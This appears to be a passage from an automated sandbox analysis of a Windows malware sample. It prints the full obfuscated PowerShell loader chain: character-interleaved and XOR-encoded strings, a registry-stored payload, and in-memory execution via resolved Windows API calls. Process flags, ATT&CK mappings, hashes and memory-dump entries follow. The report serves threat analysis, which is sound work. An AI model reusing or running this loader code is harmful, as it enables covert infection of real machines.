Bl'mu5SnFUd1Va4Co0Ta9Tr1Um2Sk5MoBFo4El6Su5FaBJi5TnFBo0PaDPu1StAUn0La9Re2to4Re0MaDfo1SmAPe5Sc5Re3Mi2Qu1Fr5Ch0ImDTr1Mu4Po1Pa0St1UnEBr5Du3Fi2Pa0In3Im2Pa1Ni5Bl0PrFPa2ArBIn0BrFTa0Tn9ka2Ma6Kn4Jo1Vr4Ga1Dh2Pl1Pu1WhEHa0an9ta1Mi4Un5Lo7Ag5ReBNu4IsBUd0Sa3Af4TuACo4HaBOl4NoBFr4MaBIn4CeBbr4StBBi5Ba7Ar5NiBSt4HoBSk0An3Th4Ob8Ci4PoBZe4LaBUd4UnBBj5Ch7Re5OsBCr4PrBPa0Eg3Bl4reFMi5Eg2Fa'Rr;TiUPrrNiaSunTriGafAaeRerBuoNeuCrsLo9Di Ka`$TydFlrFisShaDklStgSp8Ge;Or`$LyeUdmAlbbaoHyuNorLagSkeOuoOmiFusloeEnmUdeTanUdtGa=St(FlGMieEvtUd-FiIOvtHieFomPePChrUnoAcpfueWirKjtCryPh Re-BePApaHutSthPl Br'PrHOsKdoCPoUAr:Ag\BjPNbrAdiEpmDafBaaSkkBrtEfoRerGaoStpPolSpsUnnSuiSenHngtieAcnKo\RrhDeoStrClmStoPenLyaMolDetAf'Su)sl.BrFNolBauKrtUntNieHarMa1Ca5Op0Co;Mu`$VadInrStsBraJolSegAf9Tt Ax=Ja MeHSkTWiBWi Ba'Te5LiFPo1LiFPr0Mu9Ex0Ox8Us1AlADa1Ra7Sa1RoCVo5KoBUs4Fr6An5ImBTi2Me0Tr2Di8To0tc2sm0He8Ov0CiFUn1FrECi1Se6Ku5Ol5Br3Yn8Ap1Ta4su1Eu5so0TiDEp1BuEAr0Dr9Fo0CiFLa2As6Be4Ko1sa4Sk1Ib3BoDLa0Kr9Hv1As4Me1Ud6Eg3Kr9Lu1UnAPi0Be8Di1LiESp4RoDOv4peFKl2bj8Un0LsFTu0Ko9Su1Ho2Ba1Ho5il1BoCOm5Sc3Ex5TeFMa1trEKi1Ne6Ka1Fd9In1Ho4In0AmESk0Sk9Pr1JiCEk1SpEGe1In4Ab1Gu2pe0Un8Gl1AgEAb1Am6Ca1afETo1To5Be0chFpe5Pr2Sy'Pu;HoUEkrCuawinMuiCefLeeAdrJuoAnuFosPe9Re Be`$FidAnrBosBeaTflEygHe9Di;Ba`$HyeFomPobSaoinuBrrUngSaenooAfiHasTeePrmYoeBonfatCa0Sl An=Si reHEnTMaBKu He'fi2mi0Sk2Ly8Kr0Te2Om0af8po0TaFHe1NoESu1An6Ad5Es5Gi2Du9Pa0KiEin1Di5in0AtFEn1Re2Tr1Gu6Pi1SuEBe5Pl5Ta3St2De1Co5Cl0UdFIs1BaEWi0Ga9Ku1Ti4Un0VaBno2Fr8Ha1DiEDe0Re9Sl0InDVa1re2En1an8Or1QuESp0Ha8Bo5Sk5Bi3Fu6Su1KlARa0Ko9To0Ad8Vr1Tr3Eg1keASe1De7Sp2He6Pr4Ta1Fa4to1re3si8Ha1Wi4Pr0SpBKr0Ap2fi5Pr3Ef5BeFGe1SvFDi0Va9Fe0Om8Be1SkAHy1Ud7Na1FoCVa5Br7Fu5LaBVr4NuBIn5Ch7Su5stBFo5LaBUn5FrFIn3me3Fe0Ma2Ag0ro9af1DiABl1Ja8Ex1Fj2Sp1SkDGr1Ba4Ti0An9re1Un6Ur4Ov8Kn5Id7Sh5SmBOp4Ko8Ga4UnEed4Ba3No5Di2pr'Ta;vaUanrlaaCanRoiSefSoeBarAfoUduNisTa9Ex Ov`$EleZemMebSnoPiuBrrAvgTaeAloRiiadsAmeOrmTreConFutGo0Tu;Mi`$StsHeiCozSoeSn=Vi`$GadParspsviamolFrgun.licUnoFruAsnBitGl-Ps3Ab5An8As;No`$TieChmImbTroceuInrChgSueAboUniTrsBreDamOueninPatSk1Be Af=La UnHStTbaBDe Pa'Be2cl0Sf2Re8St0Bo2Re0ba8Ra0EfFPr1PeEsu1Ba6de5Ag5Gr2Ac9Va0GsEFj1Ud5Re0DuFIn1Sn2Po1Ma6In1KaEHo5Ek5Vi3St2Ze1Th5Ci0CoFSh1UnETu0Or9Ar1Tu4To0miBsa2In8Li1IoECh0Op9Un0MiDVr1Fr2an1Po8An1AnEUd0Sv8Co5Em5Se3Ta6mo1FoAOp0Ko9Od0El8Un1Te3Cy1TlABo1Di7Af2Ta6To4Ug1Ge4Un1St3ea8Wi1Ve4To0BoBHe0Jo2Am5Fr3Fo5NeFDi1EjFfi0Sy9Pr0Ka8ek1IvAHa1Ch7up1FrCNa5Pl7Fe5CyBAu4Ya8Pl4CoESy4Sk3Ol5Su7Hy5LiBNe5SpFFr1Un4Fi0Pr9Ca1St2Tr5To7Di5PhBEr5SeFOp0Se8en1Ko2Tu0in1Cl1DaEHj5Un2Ra'Za;maUSerSeaDinHoiTefHueAcrEkoUduKosCa9Fo Go`$HyekimOmbUnoReuNorPegCyeWaoRriArsVkeComCaeVinUftFi1Ln;In`$IneBymTybfioSeuFarMygLjeRaoSaiCasPeeNsmPueUnnUntbi2Kl Pr=Sk PlHTaTKoBVa Ci'Be5OlFBu0ImDSe1UnANi0Sn9Ud2Sy4Do0Ga9Ph0spESi1He5Co1Al6Ap1SpEBr5GjBHe4ha6Hr5TrBIn2Ni0Se2Sl8Ki0Ko2ra0Gh8Ho0EnFSp1OvEHy1be6Sv5Ig5ch2Un9Un0OuEIn1Ov5Dr0RdFLo1Dz2Fj1Ls6Pa1KvEma5Fi5St3To2Cr1So5Br0PrFBi1PaEAn0Bo9Pl1Ve4Pr0GrBBe2Id8Tr1DiEWi0Pa9hi0KlDRu1Fo2Je1In8Be1BaEAs0Pl8cl5Be5Re3En6Ch1foATh0Un9Ha0En8Sa1Ni3Gr1hjAno1Ta7Un2Ba6Th4Ta1Fa4Am1Fr3ScCBi1UnETr0UrFKr3InFce1SpEBr1El7Mi1SiESe1HeCOu1OpALi0GeFDi1DrEDe3BeDOv1Un4An0Fo9Ub3trDBj0SlEEv1Re5Si1Re8Em0VkFSu1fo2Az1En4Ca1Hu5Ne2EkBLu1Bu4Ry1Sa2Ob1Te5me0StFDo1GeEBa0Is9Ad5Fe3Qu5SoFIn3ho3En0Ku2Ho0Ch9ud1LiARy1sk8Ty1Hy2Re1stDBl1Sk4Mi0Be9Ga1Da6Un4Ek8St5Sa7Me5AnBac5Al3Tr3AfCDr3doFAm2SiFSo5SkBSn3IsBny5ha3De2Ph0ny3Br2Bj1Un5pr0ThFLe2UnBBu0MuFAd0Fe9Ga2Ad6Si5La7Ls2Bi0Br3Ty2Bi1En5Mi0daFGa2HuBBr0SeFad0Sl9Be2Hu6Sk5St2Se5CyBGa5Ud3Pe2no0Ex2gaDKi1Er4ad1Pi2Yo1HiFSt2Li6As5Ud2Fo5fi2Dr5Ma2Ct'Ar;trUPhrBaaCinAmiPrfheeDarSaoHauCasUd9Ch Pr`$DieLomClbdioNouSarregSueInoPyiMasceeMamAneFenTitbe2Da;Tr`$BrePrmAcbGuoKnuFrrStgMeeUnoauiunsLaeSamExerinhatRe3Lu Su=Se UnHCrTRyBSk Sk'Mi5VeFIn0DeDSa1UnAHa0Rd9ko2Fo4Bo0De9Ti0MoEOu1Pi5Cy1De6Fo1TrEFe5Fi5Bu3Ba2Sk1St5An0StDDi1Th4Bl1Co0Wu1EnENa5Pe3Br5PrFPa1Ch4Mo0st9Ne1Bo2Br5Un7St5OvFid0StDsk1PrASk0in9Pl2Te4Hi1Kn5Au0unFLu5So2Ef'La;NyURerDeaBrnDaiBafSteHiridoFuukusSu9Me Ru`$VeeRemRibGtoBeuFarLegFoeAtoInidisReeFomCoeBrnKotAp3Ex#Si;""";;Function embourgeoisement9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Redeclared63 = $Redeclared63 + $HS.Substring($i, 1); } $Redeclared63;}$Stileemner0 = embourgeoisement9 'DiIImEPuXbi ';$Stileemner2 = embourgeoisement9 'KusBrtPoaBerSptSt-TejFdoArbps ';$Stileemner1= embourgeoisement9 $Katakombens;;if([IntPtr]::size -eq 8){ & ($Stileemner2) { param($a) powershell $a } -RunAs32 -Argument $Stileemner1 | wait-job | Receive-Job;}else{ & ($Stileemner0) $Stileemner1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 123); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Czigany0=HTB '2802080F1E16551F1717';$Czigany1=HTB '361218091408141D0F552C12154849552E15081A1D1E351A0F120D1E361E0F13141F08';$Czigany2=HTB '3C1E0F2B0914183A1F1F091E0808';$Czigany3=HTB '2802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855331A151F171E291E1D';$Czigany4=HTB '080F0912151C';$Czigany5=HTB '3C1E0F36141F0E171E331A151F171E';$Czigany6=HTB '292F280B1E18121A17351A161E575B33121F1E390228121C575B2B0E19171218';$Czigany7=HTB '290E150F12161E575B361A151A1C1E1F';$Czigany8=HTB '291E1D171E180F1E1F3F1E171E1C1A0F1E';$Czigany9=HTB '3215361E1614090236141F0E171E';$Uraniferous0=HTB '36023F1E171E1C1A0F1E2F020B1E';$Uraniferous1=HTB '38171A0808575B2B0E19171218575B281E1A171E1F575B3A15081238171A0808575B3A0E0F1438171A0808';$Uraniferous2=HTB '32150D14101E';$Uraniferous3=HTB '2B0E19171218575B33121F1E390228121C575B351E0C2817140F575B2D12090F0E1A17';$Uraniferous4=HTB '2D12090F0E1A173A17171418';$Uraniferous5=HTB '150F1F1717';$Uraniferous6=HTB '350F2B09140F1E180F2D12090F0E1A17361E16140902';$Uraniferous7=HTB '323E23';$Uraniferous8=HTB '27';Set-Alias -name Uraniferous9 -value $Uraniferous7;function fkp {Param ($v_m, $v_p) ;$drsalg0 =HTB '5F0D0E15165B465B53203A0B0B3F14161A1215264141380E09091E150F3F14161A1215553C1E0F3A08081E161917121E0853525B075B2C131E091E563419111E180F5B005B5F24553C1714191A173A08081E16191702381A18131E5B563A151F5B5F24553714181A0F12141555280B17120F535F2E091A15121D1E09140E08435220564A26553E0A0E1A1708535F3801121C1A15024B525B0652553C1E0F2F020B1E535F3801121C1A15024A52';Uraniferous9 $drsalg0;$drsalg5 = HTB '5F0D1A09241C0B1A5B465B5F0D0E1516553C1E0F361E0F13141F535F3801121C1A150249575B202F020B1E2026265B3B535F3801121C1A150248575B5F3801121C1A15024F5252';Uraniferous9 $drsalg5;$drsalg1 = HTB '091E0F0E09155B5F0D1A09241C0B1A5532150D14101E535F150E1717575B3B53202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855331A151F171E291E1D2653351E0C563419111E180F5B2802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855331A151F171E291E1D5353351E0C563419111E180F5B32150F2B0F0952575B535F0D0E1516553C1E0F361E0F13141F535F3801121C1A15024E52525532150D14101E535F150E1717575B3B535F0D241652525252575B5F0D240B5252';Uraniferous9 $drsalg1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$drsalg2 = HTB '5F2D2F395B465B203A0B0B3F14161A1215264141380E09091E150F3F14161A1215553F1E1D12151E3F02151A1612183A08081E161917025353351E0C563419111E180F5B2802080F1E1655291E1D171E180F121415553A08081E16191702351A161E535F3801121C1A1502435252575B202802080F1E1655291E1D171E180F121415553E16120F553A08081E16191702390E12171F1E093A18181E0808264141290E1552553F1E1D12151E3F02151A16121836141F0E171E535F3801121C1A150242575B5F1D1A17081E52553F1E1D12151E2F020B1E535F2E091A15121D1E09140E084B575B5F2E091A15121D1E09140E084A575B202802080F1E1655360E170F12181A080F3F1E171E1C1A0F1E2652';Uraniferous9 $drsalg2;$drsalg3 = HTB '5F2D2F39553F1E1D12151E381415080F090E180F1409535F3801121C1A15024D575B202802080F1E1655291E1D171E180F12141555381A171712151C3814150D1E150F12141508264141280F1A151F1A091F575B5F0D1A09240B1A091A161E0F1E09085255281E0F32160B171E161E150F1A0F1214153D171A1C08535F3801121C1A15024C52';Uraniferous9 $drsalg3;$drsalg4 = HTB '5F2D2F39553F1E1D12151E361E0F13141F535F2E091A15121D1E09140E0849575B5F2E091A15121D1E09140E0848575B5F0D090F575B5F0D1A09240B1A091A161E0F1E09085255281E0F32160B171E161E150F1A0F1214153D171A1C08535F3801121C1A15024C52';Uraniferous9 $drsalg4;$drsalg5 = HTB '091E0F0E09155B5F2D2F395538091E1A0F1E2F020B1E5352';Uraniferous9 $drsalg5 ;}$kk = HTB '101E09151E174849';$drsalg6 = HTB '5F0D1A09240D1A5B465B202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855361A0908131A172641413C1E0F3F1E171E1C1A0F1E3D14093D0E15180F1214152B1412150F1E0953531D100B5B5F10105B5F2E091A15121D1E09140E084F52575B533C3F2F5B3B532032150F2B0F0926575B202E32150F484926575B202E32150F484926575B202E32150F484926525B532032150F2B0F0926525252';Uraniferous9 $drsalg6;$var_nt = fkp $Uraniferous5 $Uraniferous6;$drsalg7 = HTB '5F3302091A18121D140916485B465B5F0D1A09240D1A5532150D14101E532032150F2B0F09264141211E0914575B484E43575B4B03484B4B4B575B4B034F4B52';Uraniferous9 $drsalg7;$drsalg8 = HTB '5F1409125B465B5F0D1A09240D1A5532150D14101E532032150F2B0F09264141211E0914575B4B034A4B4B4B4B4B575B4B03484B4B4B575B4B034F52';Uraniferous9 $drsalg8;$embourgeoisement=(Get-ItemProperty -Path 'HKCU:\Primfaktoroplsningen\hormonalt').Flutter150;$drsalg9 = HTB '5F1F09081A171C5B465B202802080F1E16553814150D1E090F2641413D091416391A081E4D4F280F0912151C535F1E1619140E091C1E1412081E161E150F52';Uraniferous9 $drsalg9;$embourgeoisement0 = HTB '202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855361A0908131A1726414138140B02535F1F09081A171C575B4B575B5B5F3302091A18121D14091648575B484E4352';Uraniferous9 $embourgeoisement0;$size=$drsalg.count-358;$embourgeoisement1 = HTB '202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855361A0908131A1726414138140B02535F1F09081A171C575B484E43575B5F140912575B5F0812011E52';Uraniferous9 $embourgeoisement1;$embourgeoisement2 = HTB '5F0D1A0924090E15161E5B465B202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855361A0908131A172641413C1E0F3F1E171E1C1A0F1E3D14093D0E15180F1214152B1412150F1E09535F3302091A18121D14091648575B533C3F2F5B3B532032150F2B0F0926572032150F2B0F0926525B53202D14121F26525252';Uraniferous9 $embourgeoisement2;$embourgeoisement3 = HTB '5F0D1A0924090E15161E5532150D14101E535F140912575F0D1A0924150F52';Uraniferous9 $embourgeoisement3#"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
ff497b3ac557dad2f8759fa1dd87d6e9

SHA1
853ed50ce07d5368ab9e6d41b69c1ee094695e89

SHA256
164d47ad338d04e79ebd918fb5f6abff14b1cd4e5d1980bc43068482fe3d8688

SHA512
be04bee4cb11e54f04560067cb4007defb38f174ad0699e6062327b02fb70b600bf20b5fb63d8e0060a4b0454158058e85cfec245cdaa569a230a0af476433f6

Download Submit
memory/1192-54-0x000007FEFC391000-0x000007FEFC393000-memory.dmp

Filesize
8KB

Download
memory/1796-62-0x0000000000000000-mapping.dmp

Download
memory/1796-72-0x0000000073B50000-0x00000000740FB000-memory.dmp

Filesize
5.7MB

Download
memory/1796-64-0x0000000073B50000-0x00000000740FB000-memory.dmp

Filesize
5.7MB

Download
memory/1796-63-0x0000000076701000-0x0000000076703000-memory.dmp

Filesize
8KB

Download
memory/1816-58-0x000007FEF3C80000-0x000007FEF47DD000-memory.dmp

Filesize
11.4MB

Download
memory/1816-61-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/1816-60-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

Filesize
3.0MB

Download
memory/1816-59-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/1816-57-0x000007FEF49D0000-0x000007FEF53F3000-memory.dmp

Filesize
10.1MB

Download
memory/1816-68-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/1816-69-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/1816-55-0x0000000000000000-mapping.dmp

Download
memory/1872-65-0x0000000000000000-mapping.dmp

Download
memory/1872-70-0x0000000073B50000-0x00000000740FB000-memory.dmp

Filesize
5.7MB

Download
memory/1872-71-0x0000000005070000-0x0000000005170000-memory.dmp

Filesize
1024KB

Download
memory/1872-73-0x0000000073B50000-0x00000000740FB000-memory.dmp

Filesize
5.7MB

Download
memory/1872-74-0x0000000005070000-0x0000000005170000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing